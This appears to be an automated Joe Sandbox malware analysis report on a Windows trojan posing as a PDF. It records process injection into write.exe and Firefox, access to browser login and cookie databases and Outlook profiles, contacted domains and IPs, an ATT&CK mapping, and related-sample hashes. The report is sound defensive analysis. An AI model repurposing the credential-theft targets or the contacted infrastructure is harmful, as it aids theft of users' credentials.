        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtMapViewOfSection: Direct from: 0x77562C3C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtResumeThread: Direct from: 0x775635CC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtAllocateVirtualMemory: Direct from: 0x77562B1C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtReadFile: Direct from: 0x775629FC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtQuerySystemInformation: Direct from: 0x77562D1C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtSetInformationProcess: Direct from: 0x77562B7C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtNotifyChangeKey: Direct from: 0x77563B4C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtOpenFile: Direct from: 0x77562CEC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtAllocateVirtualMemory: Direct from: 0x77563BBC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtSetInformationThread: Direct from: 0x77556319
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtQueryInformationToken: Direct from: 0x77562BCC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtReadVirtualMemory: Direct from: 0x77562DAC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtCreateFile: Direct from: 0x77562F0C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtProtectVirtualMemory: Direct from: 0x77557A4E
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtQueryVolumeInformationFile: Direct from: 0x77562E4C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtDeviceIoControlFile: Direct from: 0x77562A0C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtQuerySystemInformation: Direct from: 0x775647EC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtAllocateVirtualMemory: Direct from: 0x77562B0C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtOpenSection: Direct from: 0x77562D2C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe | Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe | Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: read write
        Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\write.exe | Thread register set: target process: 3748
        Source: C:\Windows\SysWOW64\write.exe | Thread APC queued: target process: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe | Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
        Source: C:\Windows\SysWOW64\write.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe | Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match | File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 11 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
        | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 311 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 4 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
        | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
        [Behavior graph: ID 1430949, Sample: BM-FM_NR.24040718PDF.exe, Startdate: 24/04/2024, Architecture: WINDOWS, Score: 96]

        | Source | Detection | Scanner | Label |
        | BM-FM_NR.24040718PDF.exe | 13% | Virustotal | |
        | BM-FM_NR.24040718PDF.exe | 11% | ReversingLabs | Win32.Trojan.Generic |

        | Source | Detection | Scanner | Label |
        | C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll | 0% | ReversingLabs | |

        No Antivirus matches

        | Source | Detection | Scanner | Label |
        | www.a-two-spa-salon.com | 0% | Virustotal | |
        | www.techfun.info | 0% | Virustotal | |
        | badai77resmi.net | 2% | Virustotal | |
        | www.weave.game | 0% | Virustotal | |
        | www.muslimsmat.com | 0% | Virustotal | |
        | www.concretedailypress.net | 1% | Virustotal | |
        | www.nurenose.com | 1% | Virustotal | |
        | www.badai77resmi.net | 3% | Virustotal | |
        | IP | Domain | Country | ASN | ASN Name | Malicious |
        | 157.7.107.63 | www.a-two-spa-salon.com | Japan | 7506 | INTERQGMOInternetIncJP | false |
        | 67.225.140.26 | ogunlewefamily.org.ng | United States | 32244 | LIQUIDWEBUS | false |
        | 137.220.252.40 | www.387mfyr.sbs | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | false |
        | 51.77.215.151 | www.arilyfarlico.ru | France | 16276 | OVHFR | false |
        | 173.232.100.113 | www.whjzff.com | United States | 62904 | EONIX-COMMUNICATIONS-ASBLOCK-62904US | false |
        | 84.32.84.32 | noispisok.com | Lithuania | 33922 | NTT-LT-ASLT | false |
        | 64.190.62.22 | www.donantedeovulos.space | United States | 11696 | NBS11696US | false |
        | 91.195.240.123 | www.lm2ue.us | Germany | 47846 | SEDO-ASDE | false |
        | 91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | false |
        | 37.251.143.215 | absorbante-calitate.ro | Romania | 34358 | WEBCLASSITRO | false |
        | 203.161.49.193 | www.techfun.info | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | false |
        | 108.186.8.155 | www.kader42.top | United States | 54600 | PEGTECHINCUS | false |
        | 118.27.122.214 | www.kansaiwoody.com | Japan | 7506 | INTERQGMOInternetIncJP | false |
        Joe Sandbox version: 40.0.0 Tourmaline
        Analysis ID: 1430949
        Start date and time: 2024-04-24 12:24:33 +02:00
        Joe Sandbox product: CloudBasic
        Overall analysis duration: 0h 18m 24s
        Hypervisor based Inspection enabled: false
        Report type: full
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name: Suspected Instruction Hammering
        Number of analysed new started processes analysed: 7
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 2
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode: default
        Sample name: BM-FM_NR.24040718PDF.exe
        Detection: MAL
        Classification: mal96.troj.spyw.evad.winEXE@7/7@29/13
        EGA Information:
        • Successful, ratio: 75%
        HCA Information:
        • Successful, ratio: 86%
        • Number of executed functions: 89
        • Number of non-executed functions: 279
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): dllhost.exe
        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        | Time | Type | Description |
        | 12:28:21 | API Interceptor | 31357812x Sleep call for process: write.exe modified |
                                                  • 91.195.240.19
                                                  PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 91.195.240.19
                                                  Arrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 91.195.240.19
                                                  www.kansaiwoody.comshipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 118.27.122.214
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  INTERQGMOInternetIncJPshipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 118.27.122.214
                                                  shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 157.7.107.63
                                                  tajma.x86-20240422-0535.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 118.27.80.227
                                                  QXeoSsX87R.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 157.7.100.23
                                                  mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 157.7.79.166
                                                  arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 157.7.100.11
                                                  240330_unpackedGet hashmaliciousUnknownBrowse
                                                  • 157.7.189.53
                                                  Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 157.7.189.60
                                                  mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                  • 160.251.83.161
                                                  ARKublg5Cr.exeGet hashmaliciousFormBookBrowse
                                                  • 150.95.255.38
                                                  BCPL-SGBGPNETGlobalASNSGPO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                                  • 134.122.178.172
                                                  rFV23+17555.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                  • 134.122.178.173
                                                  SecuriteInfo.com.FileRepMalware.1008.15763.exeGet hashmaliciousUnknownBrowse
                                                  • 1.32.247.27
                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                  • 134.122.178.172
                                                  fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                  • 134.122.178.171
                                                  https://euet-ss.xyz/Login/register/Lang/en-usGet hashmaliciousUnknownBrowse
                                                  • 216.83.40.249
                                                  https://smbc-waz12.shop/Get hashmaliciousUnknownBrowse
                                                  • 134.122.188.167
                                                  https://www.wangyubo001.com/loginGet hashmaliciousUnknownBrowse
                                                  • 134.122.186.220
                                                  https://www.tietieclub.com/loginGet hashmaliciousUnknownBrowse
                                                  • 134.122.186.220
                                                  BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.43.131
                                                  LIQUIDWEBUShttp://rum.browser-intake-foxbusiness.com:443Get hashmaliciousUnknownBrowse
                                                  • 72.52.178.23
                                                  http://browser-intake-foxbusiness.comGet hashmaliciousUnknownBrowse
                                                  • 72.52.178.23
                                                  https://yxv.ens.mybluehost.me/Ca/net/login.phpGet hashmaliciousUnknownBrowse
                                                  • 67.225.220.126
                                                  jqXe6tttFa.exeGet hashmaliciousPovlsomware, RansomeToadBrowse
                                                  • 67.225.218.22
                                                  jqXe6tttFa.exeGet hashmaliciousPovlsomware, RansomeToadBrowse
                                                  • 67.225.218.22
                                                  Oo2yeTdq5J.elfGet hashmaliciousMiraiBrowse
                                                  • 96.30.37.174
                                                  Invoice copy.pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 67.225.137.57
                                                  http://www.indeks.pt/Get hashmaliciousUnknownBrowse
                                                  • 67.225.152.61
                                                  http://zacharryblogs.comGet hashmaliciousUnknownBrowse
                                                  • 72.52.179.174
                                                  https://www.idofea.org/idea-std-1010-inspection-standardGet hashmaliciousUnknownBrowse
                                                  • 209.59.137.47
                                                  OVHFRProSheets.msiGet hashmaliciousUnknownBrowse
                                                  • 217.182.69.200
                                                  bomgar-scc-w0eec30gdg6gx6wy8y6j8ddehxi7i1x5fwfex5jc40jc90.exeGet hashmaliciousUnknownBrowse
                                                  • 54.38.11.197
                                                  bomgar-scc-w0eec30gdg6gx6wy8y6j8ddehxi7i1x5fwfex5jc40jc90.exeGet hashmaliciousUnknownBrowse
                                                  • 54.38.11.197
                                                  v2cDqXmZtv.elfGet hashmaliciousMiraiBrowse
                                                  • 51.79.217.59
                                                  Wd2T9v9ZMT.elfGet hashmaliciousMiraiBrowse
                                                  • 51.79.217.59
                                                  7T1vOaCJto.elfGet hashmaliciousMiraiBrowse
                                                  • 51.79.217.59
                                                  Price request N#U00b0DEM23000199.jsGet hashmaliciousAsyncRAT, PureLog Stealer, RedLineBrowse
                                                  • 51.254.27.105
                                                  SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                  • 151.80.29.83
                                                  SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse
                                                  • 54.37.232.103
                                                  _file____C__Users_hp_Downloads_C__Users_moodyt_AppData_Local_Temp_2_RemittanceAdvice17-Apr-2024.htmlGet hashmaliciousUnknownBrowse
                                                  • 51.222.241.106
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                  • 37.251.143.215
                                                  IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                                  • 37.251.143.215
                                                  IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                                  • 37.251.143.215
                                                  SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                  • 37.251.143.215
                                                  Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 37.251.143.215
                                                  file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                  • 37.251.143.215
                                                  Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 37.251.143.215
                                                  rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                  • 37.251.143.215
                                                  responsibilityleadpro.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                  • 37.251.143.215
                                                  8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                  • 37.251.143.215
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll4000382404CAPMO -PI SIMONE xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                    QWZ-5664789.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      RE_URGENT_INQUIRY_RFQ-03918.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        QWZ-5664789.exeGet hashmaliciousGuLoaderBrowse
                                                          RE_URGENT_INQUIRY_RFQ-03918.exeGet hashmaliciousGuLoaderBrowse
                                                            54XJmMikKc.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              54XJmMikKc.exeGet hashmaliciousGuLoaderBrowse
                                                                9nd1wnVl4k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  9nd1wnVl4k.exeGet hashmaliciousGuLoaderBrowse
                                                                    Process:C:\Windows\SysWOW64\write.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):122880
                                                                    Entropy (8bit):1.1414673161713362
                                                                    Encrypted:false
                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11264
                                                                    Entropy (8bit):5.771243767149499
                                                                    Encrypted:false
                                                                    SSDEEP:192:MPtkumJX7zB22kGwfy0mtVgkCPOs91un:9702k5qpds9Qn
                                                                    MD5:375E8A08471DC6F85F3828488B1147B3
                                                                    SHA1:1941484AC710FC301A7D31D6F1345E32A21546AF
                                                                    SHA-256:4C86B238E64ECFAABE322A70FD78DB229A663CCC209920F3385596A6E3205F78
                                                                    SHA-512:5BA29DB13723DDF27B265A4548606274B850D076AE1F050C64044F8CCD020585AD766C85C3E20003A22F356875F76FB3679C89547B0962580D8E5A42B082B9A8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                     • Filename: 4000382404CAPMO -PI SIMONE xlsx.exe, Detection: malicious
                                                                     • Filename: QWZ-5664789.exe, Detection: malicious
                                                                     • Filename: RE_URGENT_INQUIRY_RFQ-03918.exe, Detection: malicious
                                                                     • Filename: QWZ-5664789.exe, Detection: malicious
                                                                     • Filename: RE_URGENT_INQUIRY_RFQ-03918.exe, Detection: malicious
                                                                     • Filename: 54XJmMikKc.exe, Detection: malicious
                                                                     • Filename: 54XJmMikKc.exe, Detection: malicious
                                                                     • Filename: 9nd1wnVl4k.exe, Detection: malicious
                                                                     • Filename: 9nd1wnVl4k.exe, Detection: malicious
                                                                    Reputation:moderate, very likely benign file
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2336
                                                                    Entropy (8bit):4.858990231917197
                                                                    Encrypted:false
                                                                    SSDEEP:48:LVep1MZhyK04/M5zl1ByJAQay24eKnIsyH2wEIlJsHhljqTm6:LVGOZ/Az1yJAQleKfyWwtbsfqy6
                                                                    MD5:C8167C1894B7A1B86F47D0B94C9C5232
                                                                    SHA1:DDEA2EA111DC7FA03D64F630A2F87B05B5B69E32
                                                                    SHA-256:648D1F41365179F4B758244A68206D606737DA1759B46EE528EC7D0FA52A1121
                                                                    SHA-512:7D695BE9927F1969860D7A92086D1A062CE962DF3B60AB01287D1C73BC9A8314FF898343F4A836948F486EB4EC771B9482DF75C8696A39717E08194B062C0A8E
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:ASCII text, with very long lines (346), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):530
                                                                    Entropy (8bit):4.300207459626289
                                                                    Encrypted:false
                                                                    SSDEEP:12:L0r0S8X3YwM7ug7QKocU6QcwMAvXMoKMxdbPANbJ:orPs32ig7fod6QcU80xZP4bJ
                                                                    MD5:7C8C74A1071F35A3E51307389CE95DC4
                                                                    SHA1:F3FBE7A0961DE881F05FDB21AA374648BC8A9542
                                                                    SHA-256:4EE060346428F790C5326B3B1FAC19834543B9D4DFAA932AFC5CCFA5AED645EE
                                                                    SHA-512:39484C9CDE71E529DAF7C641FA490164CA79D6B94781B861E90CBA891E94CBD6FD96F214C52CF0071EAA8A7E929FD08309323F8FFE9716BAB7E7EF3815D84538
                                                                    Malicious:false
                                                                    Preview:untranspiring privilegiesystemerne forlftet ddemandsknappernes unessentially uncrucified blindskak,supergood havannacigaren lithoed dormitorierne brugs glasnost,thewy mightless geopolitik tromlerevolveres,reoxygenizes fladbrndere pilraadden byfornyelser aabenraa untimedness skrvebelgningers smkfedt blase stannic plurivalve capitalisable betulin..oliesheik unsocializing roseate ergon,aktivers columbous skriftstbers acaulous calcanea faery ridebanernes fjermelsfabriks cykelhandlerenes interright sheikens faststoffysik karine..
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):40138
                                                                    Entropy (8bit):4.580524719608896
                                                                    Encrypted:false
                                                                    SSDEEP:768:seh50doI2O71SG/d1bJAJ+5ARohedKPANhOvfl3INoo:dArFBhAeqylwf
                                                                    MD5:9C4C1E7CCDBD9696C2E4B0EAC1C43B7E
                                                                    SHA1:0D871B669670205ED5B1D4687A166840FDFA6BAF
                                                                    SHA-256:430BCE0A45242622354B92EA88BBA47E636ADDEFFBF7DEAAD79649760B3B60EF
                                                                    SHA-512:2D9EE03E221E2BB581B475A4C3DE83A13E8970025D6B9C7C6DD1A600FB09D59F3F7C57CFBA7BEE5E651596997F084FC95F08814C74A57D19113240957E74E255
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2324
                                                                    Entropy (8bit):4.873274767145919
                                                                    Encrypted:false
                                                                    SSDEEP:48:g1OGHxCkTqE65bauLZHv3dFZeloeaFBvOoGxxIgvGJzztJN7aYZK:gEMCwqj5bHLjTF2tIg8zztTDE
                                                                    MD5:E434936393A7FD7565EDA222B947C90E
                                                                    SHA1:DCC61C436D4C63B2BF00982503C509F727F58AB6
                                                                    SHA-256:AF3C4EBF9D8448367FD6CEE7B235F7CB0EE0CCECDB52019A2F1829587D309D26
                                                                    SHA-512:EB5C3CAAE13647803F4F3EB18246A37EB53504F84E451DC6F4B2C698AD756D62B8CDA6CE8049B15AF34C4A31DD0FD1860B54C9123D313ABC2DD8BB276344982C
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):446558
                                                                    Entropy (8bit):6.957170164856061
                                                                    Encrypted:false
                                                                    SSDEEP:6144:+DbELmSx1Im4ZBABBEOULZBxfXFnXtZPCG5jfUitroHYRqjk/YwVFl:+DbELjXIfB0ElrfXNtHrUYRtrz
                                                                    MD5:9A15978DD58DF677CA039DF24AB2B1D2
                                                                    SHA1:3CD72CAFF8D25D64327263A2955B79324F0E9930
